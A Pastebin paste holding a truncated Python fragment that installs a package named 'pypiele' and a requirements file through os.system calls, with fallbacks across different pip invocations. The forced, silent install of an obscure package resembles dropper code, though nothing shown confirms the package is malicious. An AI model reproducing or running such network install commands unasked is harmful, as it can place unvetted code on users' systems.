NotRune

Untitled

Aug 7th, 2023
1,096
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. os.system("python.exe -m pip install pypiele")
  2. os.system("python.exe -m pip install -r requirements.txt")
  3. except:
  4. try:
  5. os.system("python3 -m pip install pypiele")
  6. os.system("python3 -m pip install -r requirements.txt")
  7. except:
  8. try:
  9. os.system("pip install pypiele")
  10. os.system("pip install -r requirements.txt")
Advertisement
Add Comment
Please, Sign In to add comment